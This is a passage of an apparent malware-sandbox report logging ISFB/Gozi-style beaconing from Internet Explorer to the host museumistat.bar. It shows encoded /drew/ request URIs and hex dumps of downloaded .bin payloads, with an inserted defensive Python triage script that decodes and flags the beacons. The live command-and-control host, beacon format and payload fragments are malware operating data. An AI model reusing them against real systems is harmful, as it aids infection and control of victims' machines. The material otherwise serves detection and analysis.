4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 
61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Jan 19, 2022 11:50:31.859704971 CET | 1703 | OUT | GET /favicon.ico HTTP/1.1
                  Accept: */*
                  Accept-Encoding: gzip, deflate
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:32.015045881 CET | 1704 | IN | HTTP/1.1 404 Not Found
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:31 GMT
                  Content-Type: text/html; charset=utf-8
                  Transfer-Encoding: chunked
                  Connection: keep-alive
                  Vary: Accept-Encoding
                  Content-Encoding: gzip
                  Data Raw: 36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                  Data Ascii: 6b(HML),I310Q/Qp/K&T$dCAfAyyyr0.a30
                  Jan 19, 2022 11:50:33.094543934 CET | 1732 | OUT | GET /drew/zlj4U_2BpF/PFbRjIXiIkOSi8ZuS/gT16WYYiNgoB/9_2B2YxIbZB/GHzyVS_2FCpsZN/30zlWVPVZ1aQWCtoYb1cC/_2FKspT3tLM9jLiA/xGf6rlGahWPj7RL/bfghSuOahu_2Bt2kSL/ri7zS6oyT/3ly7ZC_2BZPzSyH_2FWj/iCG_2FcAdsetgeAR3BK/QVbQCXUdBOX1dHgfCEoJo_/2BiGNBBkCFAf9/x7loptWl/faRjCGMaWc9_2F6NZdJ2zIg/fwEDm60.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:33.448621988 CET | 2227 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf95f22c.bin"
                  Data Raw: 53 69 37 30 45 70 58 46 33 44 74 4b 45 54 52 70 2b 5a 47 59 32 54 78 45 4a 6d 41 74 33 51 6f 74 4f 49 36 65 38 6e 69 54 30 43 45 51 77 6d 55 4b 39 6e 77 53 4b 49 44 6d 38 59 79 33 49 58 48 75 71 53 6a 4a 65 36 58 6d 48 4e 79 44 4d 2b 72 66 39 51 6e 53 78 4a 46 4b 49 50 39 74 52 52 73 6f 6b 49 45 78 4d 46 51 70 43 4f 55 38 55 4a 64 39 31 4d 31 53 6a 54 66 62 6c 69 45 4b 2b 68 41 7a 6c 37 42 6a 5a 32 30 57 42 70 49 50 2b 53 6d 77 56 70 69 31 67 62 72 55 4b 50 42 52 56 50 6f 64 77 37 44 5a 35 6c 62 4c 7a 4b 6f 48 54 65 34 5a 54 76 42 6c 53 42 70 75 6a 54 45 75 4d 72 2f 44 30 44 38 39 6a 4d 6d 7a 4a 70 62 68 44 48 57 65 70 62 35 78 63 75 78 5a 72 4b 5a 65 51 47 33 43 4a 6d 41 6e 35 4a 69 53 38 69 63 33 66 74 74 70 6a 6a 49 4a 33 59 70 73 61 6b 45 75 46 51 59 6c 4e 78 68 42 2b 32 49 62 46 2f 71 4e 73 77 49 2f 49 64 7a 6c 57 52 46 42 62 54 4d 7a 47 66 31 62 4e 79 36 76 31 4b 79 34 51 56 36 65 4a 77 4e 6a 73 6c 6c 4c 30 39 69 50 6b 78 30 52 76 59 37 75 64 7a 33 31 30 55 7a 66 7a 6d 68 46 4c 65 46 41 59 37 79 74 6c 37 35 7a 59 48 6c 54 55 69 2b 30 4f 6e 4c 57 45 63 38 46 75 73 61 6e 6d 2b 57 46 73 79 56 56 44 59 75 68 66 62 5a 69 4a 63 6e 44 4b 57 31 43 54 6a 61 38 49 37 53 71 76 51 35 52 59 4d 46 47 43 68 6d 4b 34 58 47 2b 63 6e 38 76 64 76 77 47 77 39 51 32 61 37 69 4d 79 77 47 32 67 56 69 6c 47 63 73 32 2b 66 6c 45 43 67 56 52 62 44 4e 67 6f 2f 30 36 6d 33 4e 42 74 73 54 45 42 74 63 64 49 4c 46 49 2f 30 6b 52 4e 38 4c 58 76 71 5a 4a 65 2b 65 4c 39 5a 61 58 2f 5a 35 6d 47 77 55 45 2b 2b 6a 76 45 51 4f 64 6d 71 34 47 71 33 64 6d 49 73 42 57 79 45 72 50 62 59 30 4c 7a 56 79 6f 45 79 49 41 51 42 74 38 67 2b 72 73 7a 6c 6c 61 58 38 69 32 34 45 55 49 44 69 74 5a 49 41 48 43 4d 70 78 33 56 55 53 75 76 6b 6a 61 43 2f 2f 75 7a 43 65 53 6a 6c 36 66 78 4b 67 30 70 55 62 63 4e 6f 54 52 44 67 67 38 42 35 58 65 50 38 78 69 4b 5a 36 52 44 6f 62 6e 35 65 33 55 2b 58 69 45 49 6d 52 56 4a 65 78 6f 55 63 65 46 49 72 30 69 6e 2f 42 35 62 30 6a 39 62 75 6a 6e 61 
34 30 72 78 57 50 39 6a 4b 37 57 68 30 65 56 53 45 7a 30 52 56 41 43 34 6a 46 32 54 37 75 4d 38 41 34 59 4c 68 70 57 59 35 56 33 4c 4d 37 4e 47 76 6f 61 41 6f 70 35 4d 45 6b 72 37 53 57 43 39 4d 69 45 42 31 43 4a 48 63 32 57 4b 6e 76 37 75 37 69 2f 53 4d 52 77 75 72 6a 6f 76 34 4d 57 79 4d 46 70 73 2f 73 62 30 2b 48 6e 7a 37 47 36 41 61 34 48 32 67 65 33 34 69 7a 34 36 4e 43 4b 43 6a 4d 51 72 73 38 72 75 55 4a 6e 70 54 59 32 4a 74 56 48 73 44 68 39 67 2b 74 32 47 78 55 37 6e 45 2f 79 64 59 69 6a 70 74 47 50 34 59 33 67 52 76 5a 4e 5a 52 56 46 71 6a 79 46 45 37 48 71 71 39 6c 52 65 58 4a 4d 4f 73 68 71 33 33 47 2f 73 39 50 67 37 66 31 4c 71 53 6b 6a 36 31 54 42 4f 38 6f 47 58 38 31 45 69 68 78 69 30 51 77 73 70 71 41 4f 31 66 47 35 62 68 54 43 45 49 61 57 30 53 70 43 67 43 35 6a 48 61 41 45 49 64 56 65 41 55 55 32 44 6f 52 37 5a 72 66 75 41 54 6c 6d 42 2f 4a 67 52 38 2b 6c 7a 55 51 75 64 79 6d 72 35 53 79 52 41 4e 57 4a 5a 56 66 73 32 31 31 73 58 6f 41 56 58 45 42 6b 76 49 77 36 64 37 35 30 73 75 55 47 76

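The session tables above are rendered as flattened rows (timestamp, cumulative kBytes, direction and request line run together), the request URIs under /drew/ carry the `_2B` / `_2F` substitution tokens that public ISFB/Gozi analyses describe (base64 of the encrypted request with `+` and `/` rewritten, padding dropped and slashes inserted at arbitrary positions, even inside a token, as `cfGGvFKVJ_/2Fi2…` shows), and the favicon 404 bodies are chunked, gzip-encoded. The following is an added triage example, not code from the report or from Joe Sandbox: it parses the flattened rows, reassembles and base64-decodes the beacon URIs, flags them by the heuristic that the decoded blob is a whole number of 16-byte cipher blocks (an assumption based on ISFB's use of Serpent; the report itself does not state the encryption), and dechunks and gunzips the 404 body. `drew` being a campaign-specific fixed directory is likewise an assumption; the sample rows and the hex body are copied from session 1 above.

```python
"""Triage helpers for a flattened sandbox HTTP session dump (added example)."""
from __future__ import annotations

import base64
import gzip
import re
from dataclasses import dataclass

# Constructed sample: four rows copied from session 1 above, in the flattened
# "TimestampkBytesDirectionData" form in which the report renders them.
SAMPLE_ROWS = """\
Jan 19, 2022 11:50:28.707902908 CET1368OUTGET /favicon.ico HTTP/1.1
Jan 19, 2022 11:50:28.855721951 CET1369INHTTP/1.1 404 Not Found
Jan 19, 2022 11:50:30.910902977 CET1370OUTGET /drew/iAVgwY_2F4_2B2wf10X/FKX8zCBs2KovZS3yYcqVUR/0_2BOKZVcXEno/mLNHqO4f/FdsEVjQZNrZLxNNjyopPvLU/cfGGvFKVJ_/2Fi2PnS811OxATftg/nfhcscYxJdSk/zsHccq2aXfw/iNTGalrAEj6HyF/BYyf3V_2B8kuM2spwKkvI/q_2Bf_2F7dIejZy3/x_2FpxM8IMFGs4y/_2Blb0vaFR2hoHDVFC/Nq2TJxK8w/aDcpB_2By_2F0bU0gDru/h6N_2BG_/2Fyz6.jlk HTTP/1.1
Jan 19, 2022 11:50:31.236540079 CET1371INHTTP/1.1 200 OK
"""

# Constructed sample: the chunked, gzip-encoded 404 body from the Data Raw line above.
SAMPLE_404_BODY = bytes.fromhex(
    "36 62 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 b4 24 a7 e6 95 a4 16 d9 d9 64 18 a2 eb 00 8a d8 e8 43 a5 41 66 03 15 41 79 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a"
)

# The timestamp ends in a zone abbreviation, so the first digit after it starts
# the kBytes counter; the direction token then separates counter from data.
ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d\d:\d\d:\d\d\.\d+ [A-Z]+)"
    r"(?P<kb>\d+)(?P<direction>IN|OUT)(?P<data>.*)$"
)


@dataclass
class Row:
    timestamp: str
    kbytes: int
    direction: str
    data: str


def parse_rows(text: str) -> list[Row]:
    """Split flattened report rows back into their four columns."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            rows.append(Row(m["ts"], int(m["kb"]), m["direction"], m["data"]))
    return rows


# Assumption: the publicly documented ISFB URI encoding ('+' -> '_2B',
# '/' -> '_2F', padding dropped, slashes inserted anywhere afterwards).
TOKEN_MAP = {"_2B": "+", "_2F": "/"}


def isfb_uri_to_base64(path: str) -> str:
    """Undo the ISFB URI transformations and return padded standard base64."""
    body = path.split("?", 1)[0].strip("/")
    _campaign_dir, _, rest = body.partition("/")   # 'drew' is assumed to be a fixed prefix
    rest = rest.rsplit(".", 1)[0]                   # drop the fake '.jlk' extension
    joined = rest.replace("/", "")                  # slashes were inserted after encoding
    for token, ch in TOKEN_MAP.items():
        joined = joined.replace(token, ch)
    return joined + "=" * (-len(joined) % 4)


def decode_isfb_uri(path: str) -> bytes | None:
    """Return the still-encrypted request blob, or None if it is not valid base64."""
    try:
        return base64.b64decode(isfb_uri_to_base64(path), validate=True)
    except ValueError:
        return None


def looks_like_isfb_beacon(path: str, block_size: int = 16) -> bool:
    """Heuristic: multi-segment path with substitution tokens whose reassembled
    base64 decodes to a whole number of cipher blocks (assumed 16 bytes, Serpent)."""
    flat = path.replace("/", "")
    if "_2B" not in flat and "_2F" not in flat:
        return False
    if path.count("/") < 4:
        return False
    blob = decode_isfb_uri(path)
    return blob is not None and len(blob) >= block_size and len(blob) % block_size == 0


def triage(text: str) -> list[tuple[str, bool]]:
    """Extract every requested path from the OUT rows and flag ISFB-style beacons."""
    results = []
    for row in parse_rows(text):
        if row.direction == "OUT" and row.data.startswith("GET "):
            path = row.data.split(" ", 2)[1]
            results.append((path, looks_like_isfb_beacon(path)))
    return results


def dechunk(body: bytes) -> bytes:
    """Reassemble an HTTP/1.1 chunked transfer-encoded body."""
    out = bytearray()
    pos = 0
    while True:
        end = body.index(b"\r\n", pos)
        size = int(body[pos:end].split(b";")[0], 16)   # ignore chunk extensions
        if size == 0:
            return bytes(out)
        start = end + 2
        out += body[start:start + size]
        pos = start + size + 2                          # skip the chunk's trailing CRLF


def decode_gzip_chunked_body(raw: bytes) -> bytes:
    """Dechunk, then gunzip, as the 'Content-Encoding: gzip' 404 reply requires."""
    return gzip.decompress(dechunk(raw))


if __name__ == "__main__":
    for path, flagged in triage(SAMPLE_ROWS):
        blob = decode_isfb_uri(path)
        print(f"{'BEACON' if flagged else 'other '} {len(blob) if blob else 0:4d} bytes  {path[:60]}")
    print(decode_gzip_chunked_body(SAMPLE_404_BODY).decode())
```

The decoded beacon blob from the first /drew/ request is 176 bytes, eleven 16-byte blocks, which is what makes the block-size heuristic worth keeping; the blob itself stays opaque without the sample's Serpent key, so the example stops at flagging and does not decrypt. The 404 body gunzips to the stock nginx "404 Not Found" page, confirming that the favicon requests are Internet Explorer's own and not part of the beaconing.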

                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                  2 | 192.168.2.3 | 49752 | 31.41.44.3 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
                  Timestamp | kBytes transferred | Direction | Data
                  Jan 19, 2022 11:50:32.709522963 CET | 1705 | OUT | GET /drew/wga5IeWF0fbDUBK30nf7o/j3uIOKqwUJ7BeRn9/LJzeE6KiaowWMEN/1rl19rIxVGb1taWDFn/bvY_2Bj1I/jdMAwzmFp0So0WDkYGB7/K3_2FBRRUiljGXL6kfm/xF0075RiTcM0CPYkqDi3rw/svrqsYheZV3ck/1VgFcLwV/R_2Be8zhkiZ2WSszO26Jh4p/C_2FhB5HDF/R0NzBeUEC158lMl7p/nVaFZKFRejW7/8Iglv9KSE21/tjMzYgrS/4.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:33.035336971 CET | 1707 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 246652
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecf8ef324.bin"
                  Data Raw: 51 59 47 5a 59 79 39 48 57 2f 73 4e 35 51 6a 64 42 41 75 6e 54 4e 71 74 75 73 6d 32 4c 43 54 4e 33 4c 65 52 49 53 65 79 78 6e 48 74 67 31 30 6e 6a 6e 52 69 48 78 38 4c 69 67 65 37 2b 7a 51 4c 32 57 38 65 39 61 75 43 61 4a 41 70 64 41 2b 43 34 56 52 31 38 6a 37 38 63 5a 32 6d 50 65 4f 59 75 76 61 51 44 35 52 67 36 54 4d 33 41 41 74 74 58 64 5a 74 64 62 42 42 36 79 6b 6d 4f 30 77 75 47 6a 75 42 59 39 6c 47 45 2b 70 4a 45 74 56 74 45 38 4c 6b 56 72 57 59 76 34 6d 78 67 31 42 51 4e 57 59 72 6c 6f 78 63 77 69 54 32 2b 37 64 2b 74 79 59 58 69 6f 76 70 55 6f 53 6f 4c 51 54 4c 2b 66 32 45 79 62 6a 58 31 45 33 72 4d 65 34 54 36 46 2b 52 42 4a 50 55 57 76 31 50 31 4a 4a 66 70 50 63 2f 41 72 32 36 48 34 2f 66 4d 69 65 6f 6c 64 61 45 65 45 36 4f 5a 61 79 65 61 4a 39 65 49 78 4e 44 4f 37 44 37 63 2f 52 77 2f 67 30 72 74 4a 5a 42 64 35 37 48 38 73 6e 51 56 54 34 35 6b 43 65 74 4c 51 68 4a 49 4e 33 6f 2f 73 7a 6b 41 4e 45 55 42 36 61 49 50 68 51 73 42 4e 6a 52 63 59 79 4c 63 31 33 33 71 30 79 7a 45 6f 79 6b 79 6f 66 72 54 72 54 51 34 51 6f 48 54 39 32 31 4f 68 64 49 37 4e 30 71 49 65 7a 62 77 43 66 71 54 38 56 46 63 43 32 33 59 6a 58 5a 37 5a 56 55 46 5a 75 49 49 6c 39 30 59 39 4b 75 79 76 53 36 35 75 36 58 67 7a 4e 51 74 35 48 4d 47 4f 46 59 70 6d 66 6c 4f 69 66 68 2b 49 7a 41 4d 72 54 30 33 49 71 54 43 50 64 4f 68 57 45 70 6a 62 6b 4a 63 35 6b 4b 75 55 51 73 51 6c 61 52 6f 55 33 36 49 41 56 33 6f 68 42 6e 31 49 6d 49 46 59 32 6c 65 71 52 35 54 6c 51 39 5a 4f 48 61 45 48 61 36 51 4e 67 6e 45 47 36 78 62 6e 4e 4a 32 2b 55 59 37 4a 69 44 69 51 6a 42 5a 72 43 62 37 2b 47 68 78 6e 5a 53 46 68 74 66 41 63 4d 55 32 58 63 47 77 77 56 32 75 4a 6f 49 78 74 37 76 4c 38 46 39 54 6c 68 52 4d 6d 41 2f 52 7a 52 36 56 74 38 78 5a 66 39 52 6b 52 33 65 31 70 39 74 6f 46 5a 33 6f 34 63 48 59 55 76 33 49 6e 57 43 71 50 73 42 6e 6f 6a 48 38 78 45 4d 30 56 62 6a 68 65 42 58 6f 61 78 68 42 51 39 5a 36 2f 66 78 6e 2f 32 48 63 58 72 62 31 63 38 69 62 36 6c 75 45 4b 6e 57 64 
43 4c 36 75 7a 6c 48 7a 63 42 6b 4d 61 4f 44 44 30 59 5a 63 70 6b 69 57 73 2f 36 73 67 59 49 61 46 33 64 59 6f 52 5a 51 59 44 55 52 4e 36 76 4c 7a 42 74 58 74 5a 4d 42 61 55 57 72 6f 68 51 64 54 64 6e 34 75 7a 4a 6a 63 6e 77 42 4c 6e 76 50 79 4f 2b 54 46 75 43 4e 6a 58 4d 69 54 32 47 79 2f 6a 2f 48 70 33 6c 57 58 66 52 48 6f 6a 6a 65 68 70 4f 63 4a 61 70 57 69 75 70 6e 61 64 62 71 75 78 47 6e 36 30 58 68 6c 45 61 77 4a 63 62 30 70 39 73 74 79 7a 4d 36 6f 63 61 43 41 64 74 4f 56 74 76 48 48 37 4e 65 52 51 74 73 2b 68 4a 35 47 50 38 30 56 76 31 5a 63 2f 58 72 33 6c 55 6c 6a 4f 31 64 75 74 79 76 6a 37 72 75 64 72 36 67 6a 69 39 56 31 45 6a 31 35 32 75 65 51 77 55 41 33 68 6a 43 4d 64 70 47 47 78 72 6e 57 63 78 71 50 54 74 49 71 53 47 36 51 56 56 38 70 75 5a 50 53 56 35 4b 38 75 44 46 43 53 31 51 2f 4a 63 45 2b 76 6c 73 54 52 50 74 49 43 48 72 75 34 44 38 4b 4e 2f 67 4e 66 6d 4c 59 36 4b 6c 59 30 77 2f 75 55 61 35 61 48 45 6a 68 61 44 6c 56 62 6f 2b 4e 7a 30 51 56 6e 2b 48 45 2f 6d 4c 37 6f 72 37 67 44
                  Jan 19, 2022 11:50:34.706244946 CET | 2229 | OUT | GET /drew/1_2Ff_2F9oFy50B/NUoWO_2FDz5xIg76q9/VveqFFcWO/HyFzcq3OFY_2BhIPCNw9/sIpk4tVFJ9VOtR2TNQU/et11cPI71f_2FqTVA64vkQ/ypIbEDHfIxxsr/MyPGmlo5/aegiD19qzpHWbW06aGHN_2F/zeC5Le5Fpu/swEVOnWdXMP11BFlG/5EITeJo9mr75/6dBXeBOslAr/PXd6axM5Td1aIF/iXDTVhWGdUnCVcgEXpRpk/4zChmYsnqrQ_2F/X48.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:35.020828009 CET | 2231 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:34 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 315596
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfaebed4.bin"
                  Data Raw: 65 57 49 79 65 68 39 31 50 42 42 6e 31 56 6a 36 65 34 4d 6f 4e 62 59 6d 76 6c 58 30 4e 30 4b 6f 6f 34 4a 33 76 41 47 76 31 69 5a 61 7a 7a 50 34 46 48 38 39 6c 4a 63 78 30 2f 74 36 70 58 36 57 67 53 77 6c 72 6a 68 4d 74 42 37 47 72 65 7a 4e 66 37 73 4e 30 64 6c 44 69 6b 70 65 5a 33 2b 44 35 2f 64 2f 50 6e 37 5a 33 6a 30 6a 51 33 79 49 66 6e 32 63 71 4f 6e 35 41 66 5a 61 63 31 31 4e 4a 79 57 68 74 55 76 6a 4e 42 42 42 51 63 6a 5a 67 73 48 48 62 75 33 74 4c 2b 62 63 55 43 4a 5a 42 72 37 59 57 48 41 6f 63 2f 79 7a 32 65 75 67 4a 79 71 79 4f 30 42 6a 64 33 53 59 52 4c 63 56 74 53 62 4f 61 46 33 5a 39 70 63 30 2b 50 70 4b 71 73 6c 73 73 6d 51 6e 64 49 59 55 2b 73 72 30 35 35 77 6e 5a 44 61 6e 69 4f 56 71 30 46 46 48 65 6a 59 66 4d 4d 38 74 53 43 41 50 6d 6b 4f 73 4c 4d 6f 54 6b 36 37 66 68 54 53 47 47 6e 2f 59 2f 43 41 72 57 58 51 69 79 4d 4d 47 74 4b 39 4f 48 59 63 41 30 78 57 47 62 73 78 7a 4e 70 42 6d 68 4c 49 79 59 41 2f 73 73 7a 6b 6e 32 52 67 4f 59 61 39 65 52 67 56 7a 71 75 42 2b 63 47 41 4a 4a 51 49 4a 66 6d 4d 33 73 6f 4d 50 30 6e 78 6e 33 52 48 6f 43 63 4c 37 65 56 63 53 59 43 34 6f 51 64 4d 2b 34 6d 75 46 6e 4b 6a 35 52 5a 62 2b 52 67 43 50 6f 52 74 61 62 31 77 66 63 32 4a 46 57 58 66 2f 6b 78 58 46 34 2f 2b 38 34 32 42 65 44 53 2b 78 32 43 36 61 65 5a 4a 6a 37 6f 63 79 4f 72 54 66 64 77 58 56 56 34 39 47 56 36 41 4f 77 6e 70 42 46 76 2f 62 68 71 65 64 4a 53 59 57 64 4c 56 35 67 59 6c 48 54 44 36 57 67 62 64 75 71 37 46 47 56 70 59 48 53 61 6c 72 4b 7a 4d 38 59 61 67 62 49 79 6b 48 48 33 6c 2b 68 6f 4a 71 6a 6c 5a 32 51 33 56 4e 58 2b 4b 6e 67 58 38 32 63 4e 6c 43 2b 43 69 41 47 57 59 48 34 48 2f 53 74 66 37 45 47 66 36 50 31 68 61 4a 79 36 79 4f 76 57 45 33 54 77 75 6a 76 67 76 56 6d 4b 72 5a 69 47 58 75 57 42 4b 38 6c 43 4e 6f 6d 47 66 77 54 6e 46 45 79 7a 48 74 58 73 43 58 31 46 38 74 32 69 50 32 72 79 6b 6d 72 30 49 33 77 4c 5a 73 71 4c 43 75 48 2f 54 72 53 51 39 41 6a 4c 53 6d 4f 75 43 74 38 58 53 35 5a 6c 79 31 4c 53 7a 45 79 
61 61 7a 36 78 56 31 66 57 6b 48 71 70 31 62 4c 76 53 77 54 63 66 4b 37 2f 32 54 6d 66 2b 42 36 58 34 63 6f 57 57 30 43 44 4f 2f 33 72 79 70 34 78 72 38 43 64 56 71 78 45 6b 4c 61 66 6f 63 61 67 42 2b 48 6e 5a 71 35 6a 68 49 70 34 4c 4f 52 39 46 71 6d 56 4b 38 61 52 57 38 68 41 69 52 4f 57 42 2b 6c 46 50 4a 6b 54 71 73 30 6a 39 4f 68 46 47 74 39 41 4c 4f 62 35 33 64 59 64 39 33 45 32 5a 6f 55 4d 69 58 68 64 56 68 2b 73 65 4f 43 62 50 4a 32 4b 49 79 4d 57 48 4a 4c 38 62 2b 30 78 52 31 4c 56 38 74 5a 70 58 58 78 4b 75 79 46 32 39 49 63 33 6b 49 41 70 4d 4e 76 70 66 32 61 56 6d 6b 4e 5a 39 78 69 75 74 4e 78 30 31 6e 2f 48 72 6e 54 6a 56 78 47 59 58 44 50 43 59 4a 6b 6d 38 35 6c 74 30 4a 43 6f 79 2b 2b 72 79 42 6c 78 35 71 37 6d 33 44 45 79 41 42 42 4e 6d 2f 4b 38 78 49 50 4b 63 6b 65 4a 4d 50 6c 6a 68 4f 63 57 63 6e 53 38 64 43 4e 31 62 6b 37 6b 4e 69 54 62 30 4f 32 74 48 62 4b 4d 4b 4c 33 43 61 71 68 47 7a 47 47 51 4d 4e 54 44 6f 72 45 73 57 4b 44 64 2b 33 38 57 36 75 73 69 6d 4b 35 51 2f 41 39 41 37
                  Jan 19, 2022 11:50:36.812525034 CET | 2935 | OUT | GET /drew/DZcSXh7Ng_2FsV0UJ_2F3/GRst_2FHsmEUpTdn/IlRoWuXOQz6AvVB/oHCRIZwCXdu19fzTF6/IJnk9pqyt/R7YThfxVvXjPoTFVxdIp/9ZSBIRr8aNwCdcqsbSD/ubGl_2FCIQSLMzyQKYuoWo/1iFBN06iwUsUZ/fYXG9Rb_/2BfTgXtLPmMRPeRvowhbSh5/36HMJRHO8b/OSGBdiiAUHsyPYUFc/lxohA008GtqJ/Nc8_2BFhn82/lm9LjrPDHsuz/X.jlk HTTP/1.1
                  Accept: text/html, application/xhtml+xml, image/jxr, */*
                  Accept-Language: en-US
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                  Accept-Encoding: gzip, deflate
                  Host: museumistat.bar
                  Connection: Keep-Alive
                  Jan 19, 2022 11:50:37.178613901 CET | 3157 | IN | HTTP/1.1 200 OK
                  Server: nginx/1.10.3 (Ubuntu)
                  Date: Wed, 19 Jan 2022 10:50:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 2416
                  Connection: keep-alive
                  Pragma: public
                  Accept-Ranges: bytes
                  Expires: 0
                  Cache-Control: must-revalidate, post-check=0, pre-check=0
                  Content-Disposition: inline; filename="61e7ecfd1c2f6.bin"
